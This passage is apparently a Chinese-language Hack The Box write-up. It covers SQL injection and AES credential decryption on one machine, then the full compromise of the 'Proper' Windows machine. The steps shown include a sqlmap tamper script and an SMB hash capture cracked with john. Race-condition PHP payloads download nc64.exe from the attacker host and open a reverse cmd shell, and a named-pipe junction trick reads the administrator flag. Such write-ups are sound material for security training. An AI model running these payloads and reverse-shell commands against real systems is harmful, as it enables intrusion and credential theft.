    string(16) "k19D193j.<19391("
  }
}

得到AES_KEY

尝试SQL注入

curl "http://127.0.0.1:1234/index.php?method=select&username='+or+1%23&table=passwords"
selectarray(1) {
  [0]=>
  array(1) {
    ["aes_key"]=>
    string(16) "k19D193j.<19391("
  }
}

手工注入

curl "http://127.0.0.1:1234/index.php?method=select&username='+or+1%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+1%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+database()%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema='bread'%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+group_concat(column_name)+from+information_schema.columns+where+table_name='passwords'%23&table=passwords"
curl "http://127.0.0.1:1234/index.php?method=select&username='+union+select+group_concat(password)+from+bread.passwords%23&table=passwords"

得到H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=

SSH端口映射跑SQLMap

1 2	ssh -f -N -L 1234:127.0.0.1:1234 development@10.10.10.228 sqlmap -u "http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords"

sqlmap的步骤就懒得写了

解密

#!/usr/bin/env python3
import base64
from Crypto.Cipher import AES
iv = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
cipher = base64.b64decode("H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=")
_aes = AES.new(b"k19D193j.<19391(", AES.MODE_CBC, iv)
plain = _aes.decrypt(cipher)
print(plain)

得到凭证administrator:p@ssw0rd!@#$9890./
登入SSH服务

1 2	type c:\Users\Administrator\Desktop\root.txt c04f72045d76a74c63a602f199a79ecd

挺综合的一台机器

Proper

端口扫描

nmap -sV -sT -Pn 10.10.10.231

Nmap scan report for 10.10.10.231
Host is up (0.081s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

路径扫描

1
2
3

---- Scanning URL: http://10.10.10.231/ ----
==> DIRECTORY: http://10.10.10.231/assets/
==> DIRECTORY: http://10.10.10.231/licenses/

漏洞利用

浏览主页源码看到

<script type="text/javascript">
$(document).ready(function(){
	'use strict';
	jQuery('#headerwrap').backstretch([ "assets/img/bg/bg1.jpg", "assets/img/bg/bg3.jpg" ], {duration: 8000, fade: 500});
	$( "#product-content" ).load("/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b",function() {});
});
</script>

1	curl http://10.10.10.231/products-ajax.php

<?php
	// [8] Undefined index: order On line 6 in file C:\inetpub\wwwroot\products-ajax.php
	define('SECURE_PARAM_SALT','hie0shah6ooNoim'); 
	include('functions.php'); 
	include('db-config.php'); 
	if ( !$_GET['order'] || !$_GET['h'] ) {
		// Set the response code to 500 
		http_response_code(500); 
		// and die(). Someone fiddled with the parameters. 
		die('Parameter missing or malformed.'); 
	}  
?>

测试得到以下算法
Hash = md5(Salt+Payload)

SQLMap tamper

#!/usr/bin/env python3
import os
import string
import hashlib
from urllib.parse import quote_plus
from lib.core.enums import PRIORITY

def tamper(payload, **kwargs):
	salt = b"hie0shah6ooNoim"
	h = hashlib.md5(salt + payload.encode()).hexdigest()
	retVal = "{}&h={}".format(payload, h)
	return retVal

sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py --dbs --batch --skip-urlencode
available databases [3]:
[*] cleaner
[*] information_schema
[*] test

sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner --tables --batch --skip-urlencode
Database: cleaner
[3 tables]
+-----------+
| customers |
| licenses  |
| products  |
+-----------+

sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner -T licenses --columns --batch --skip-urlencode
Database: cleaner
Table: licenses
[4 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| customer_id | int(11)     |
| id          | int(11)     |
| license     | varchar(50) |
| product_id  | int(11)     |
+-------------+-------------+

proxychains sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner -T licenses -D customer_id,id,license,product_id --dump --batch --skip-urlencode
Database: cleaner
Table: licenses
[18 entries]
+-------------+----+--------------------------------------+------------+
| customer_id | id | license                              | product_id |
+-------------+----+--------------------------------------+------------+
| 4           | 1  | 7d4cdf91-119b-414d-b16b-7cb841b2c182 | 4          |
| 17          | 2  | e7b59b20-8c70-48b0-91da-58bf354b18d5 | 8          |
| 17          | 3  | 3ea26f9c-f7c8-428f-a613-f4c66f08d0b9 | 6          |
| 17          | 4  | 372b02bd-8730-4bc6-a6fb-8cf9726f797b | 4          |
| 15          | 5  | 75ab3363-43d4-4e6b-903a-9d36919b36be | 8          |
| 16          | 6  | 139aff78-770c-4c59-9aef-32c4c65e68b3 | 4          |
| 22          | 7  | bdf82583-9f1a-42a3-b892-4b569e77f4c9 | 2          |
| 11          | 8  | d7da6b56-6f8c-4a26-85cc-c80860f3021a | 8          |
| 21          | 9  | 2ca03799-bd0d-4baa-a163-eb2a3b143f22 | 4          |
| 7           | 10 | 0a65e4e4-f1c7-4452-9bf0-02f4d6c35410 | 4          |
| 7           | 11 | 2e14ce43-8e85-43d7-b9ae-ab2c2ff64bf8 | 4          |
| 15          | 12 | 873f8add-2f3c-4da2-9164-649f55c1d329 | 4          |
| 2           | 13 | c63524b6-6346-4a34-b5c3-a3fe46593df1 | 4          |
| 25          | 14 | ad228131-518a-4527-8a1c-46d0723b691d | 2          |
| 1           | 15 | 4fa6a5cd-2081-4222-9b46-6c58df72bcfd | 8          |
| 1           | 16 | 183a7e47-e3cf-46f9-80fa-acb63590cc1c | 2          |
| 9           | 17 | 49dea5ef-3f7f-4790-9b94-b6bf29f5f893 | 2          |
| 4           | 18 | 41e5be3a-20fc-47b2-9dcc-c05def688cdb | 6          |
+-------------+----+--------------------------------------+------------+

sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner -T customers --columns --batch --skip-urlencode
Database: cleaner
Table: customers
[4 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| customer_name | varchar(50)  |
| id            | int(11)      |
| login         | varchar(255) |
| password      | varchar(255) |
+---------------+--------------+

sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamp.py -D cleaner -T customers -C customer_name,id,login,password --dump --batch --skip-urlencode
Database: cleaner
Table: customers
[11 entries]
+---------------------+----+------------------------------+----------------------------------+
| customer_name       | id | login                        | password                         |
+---------------------+----+------------------------------+----------------------------------+
| Vikki Solomon       | 1  | vikki.solomon@throwaway.mail | 7c6a180b36896a0a8c02787eeafb0e4c |
| Neave Stone         | 2  | nstone@trashbin.mail         | 6cb75f652a9b52798eb6cf2201057c73 |
| Bertie McEachern    | 3  | bmceachern7@discovery.moc    | e10adc3949ba59abbe56e057f20f883e |
| Jordana Kleiser     | 4  | jkleiser8@google.com.xy      | 827ccb0eea8a706c4c34a16891f84e7b |
| Mariellen Chasemore | 5  | mchasemore9@sitemeter.moc    | 25f9e794323b453885f5181f1b624d0b |
| Gwyneth Dornin      | 6  | gdornina@marriott.moc        | 5f4dcc3b5aa765d61d8327deb882cf99 |
| Israel Tootell      | 7  | itootellb@forbes.moc         | f25a2fc72690b780b2a14e140ef6a9e0 |
| Karon Mangham       | 8  | kmanghamc@state.tx.su        | 8afa847f50a716e64932d995c8e7435a |
| Janifer Blinde      | 9  | jblinded@bing.moc            | fcea920f7412b5da7be0cf42b8c93759 |
| Laurens Lenchenko   | 10 | llenchenkoe@macromedia.moc   | f806fc5a2a0d5ba2471600758452799c |
| Andreana Austin     | 11 | aaustinf@booking.moc         | 25d55ad283aa400af464c76d713c07ad |
+---------------------+----+------------------------------+----------------------------------+

MD5基本都是弱口令随便
随意用一个凭证登入

1	curl http://10.10.10.231/licenses/licenses.php?theme=&h=9094e65be4a9dc27cd4af70674a99c64

<?php
	// [2] include(/header.inc): failed to open stream: No such file or directory On line 36 in file C:\inetpub\wwwroot\functions.php
	// Following function securely includes a file. Whenever we 
	// will encounter a PHP tag we will just bail out here. 
	function secure_include($file) { 
		if (strpos(file_get_contents($file),'<?') === false) { 
			include($file);                //<<<<< Error encountered in this line.
		} else { 
			http_response_code(403); 
			die('Forbidden - Tampering attempt detected.'); 
		} 
	} 
?>

尝试RFI

1	python3 -m http.server 9998

curl http://10.10.10.231/licenses/licenses.php?theme=http://10.10.16.7:9998/&h=c68113684a9e7ddca835d8f0235e2759

[2] include(): http:// wrapper is disabled in the server configuration by allow_url_include=0
On line 36 in file C:\inetpub\wwwroot\functions.php

不能使用http协议

1 2	python3 smbserver.py -ip 10.10.16.7 -smb2support evil . curl http://10.10.10.231/licenses/licenses.php?theme=//10.10.16.7&h=b1a3d9ecf02d4854f3a730f8b2a9af5d

[*] Incoming connection (10.10.10.231,51174)
[*] AUTHENTICATE_MESSAGE (PROPER\web,PROPER)
[*] User PROPER\web authenticated successfully
[*] web::PROPER:aaaaaaaaaaaaaaaa:956a52cc975ff5da7c40b3a88a2280cd:0101000000000000808cbaf62b60d701fee1b72b5916ee630000000001001000670049005600790046004b0055006a00020010005a004a006b004300690054006a00480003001000670049005600790046004b0055006a00040010005a004a006b004300690054006a00480007000800808cbaf62b60d70106000400020000000800300030000000000000000000000000200000df729e7896fc8038dada23bc657eaeb31358ef464f456b1fa869efec2d18cea10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
[*] Closing down connection (10.10.10.231,51174)
[*] Remaining connections []

拿到Hash

cat hash 
web::PROPER:aaaaaaaaaaaaaaaa:956a52cc975ff5da7c40b3a88a2280cd:0101000000000000808cbaf62b60d701fee1b72b5916ee630000000001001000670049005600790046004b0055006a00020010005a004a006b004300690054006a00480003001000670049005600790046004b0055006a00040010005a004a006b004300690054006a00480007000800808cbaf62b60d70106000400020000000800300030000000000000000000000000200000df729e7896fc8038dada23bc657eaeb31358ef464f456b1fa869efec2d18cea10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000

john --wordlist=/usr/share/wordlists/rockyou.txt hash
charlotte123!    (web)

得到凭证

1	web:charlotte123!

重启smb服务

1	python3 smbserver.py -ip 10.10.16.7 -username web -password charlotte123! -smb2support yolo .

1 2	if (strpos(file_get_contents($file),'<?') === false) { include($file); //<<<<< Error encountered in this line.

通过竞争修改本地文件内容来进行Bypass

#!/bin/bash
payload=$1
while((1))
do
	echo "$payload" > header.inc
done

GetShell

1	<?php echo "hacked";system("cmd /c powershell iwr http://10.10.16.7:9995/nc64.exe -outf \windows\system32\spool\drivers\color\yolo.exe"); ?>

1	<?php echo "hacked";system("cmd /c start \windows\system32\spool\drivers\color\yolo.exe -e cmd 10.10.16.7 9990"); ?>

#!/usr/bin/env python3
import requests
import random
import threading

def thd():
	_ = 0
	while _ < 100:
		req = requests.session()
		login_url = "http://10.10.10.231/licenses/index.php"
		username = "vikki.solomon@throwaway.mail"
		password = "password1"
		data = {"username":username, "password":password}
		res = req.post(url=login_url, data=data)
		index_url = "http://10.10.10.231/licenses/licenses.php"
		res = req.get(url=index_url)
		payload_url = "http://10.10.10.231/licenses/licenses.php?theme=//10.10.16.7/yolo&h=05e45a8f5f58f601063e937929048fd7"
		res = req.get(url=payload_url)
		if "hacked" in res.text:
			print(res.text)
		logout_url = "http://10.10.10.231/licenses/logout.php"
		res = req.get(url=logout_url)
		_ += 1

poll = []
for i in range(0, 5):
	single_thd = threading.Thread(target=thd)
	poll.append(single_thd)
for n in poll:
	n.start()

1	cmd /c powershell iwr http://10.10.16.7:9995/nc64.exe -outf \windows\system32\spool\drivers\color\nc64.exe

不行

1	cmd /c powershell iwr http://10.10.16.7:9995/nc64.exe -outf \windows\system32\spool\drivers\color\yolo.exe

行
不知道触发了什么奇怪的bug, 改个文件名就能写入了
~~家目录下就能写, 害隔着World-Writable呢~~

1 2	type c:\users\web\desktop\user.txt 540dbda93520798e554345539fe38988

权限提升

dir \"Program Files"\cleanup

11/15/2020  05:03 AM         2,999,808 client.exe
11/15/2020  10:22 AM               174 README.md
11/15/2020  06:20 AM         3,041,792 server.exe

FTP莫名其妙用不了

传文件只能曲线救国了

Apache2允许PUT但是不能直接上传文件

不过文件会进行流量传输

所以就监听流量然后还原文件

逆向没逆明白, 只能看Raid上的WP了

先做一个链接

1	mklink /j \users\web\downloads\yoloyolo \users\administrator\desktop

操控管道\\.\pipe\cleanuppipe

1	echo CLEAN \users\web\downloads\yoloyolo\root.txtx > \\.\pipe\cleanuppipe

此时Server.exe会通过管道的内容来运行程序, 会将程序加密并移动至\programdata\cleanup(这个程序应该是administrator运行的)

删掉链接, 创建文件夹, 再还原文件

rmdir \users\web\downloads\yoloyolo
mkdir \users\web\downloads\yoloyolo
echo RESTORE \users\web\downloads\yoloyolo\root.txtx > \\.\pipe\cleanuppipe
type \users\web\downloads\yoloyolo\root.txt

f2167014736b2934e9721962b525f674

~~这台机子的姿势太骚了~~

What a machine.

EOF

xXxYOLOxXx

HTB_Windows_Set_0

love

端口扫描

漏洞利用

权限提升

Atom

端口扫描

漏洞利用

权限提升

端口扫描

路径扫描

漏洞利用

权限提升

Proper

端口扫描

路径扫描

漏洞利用

权限提升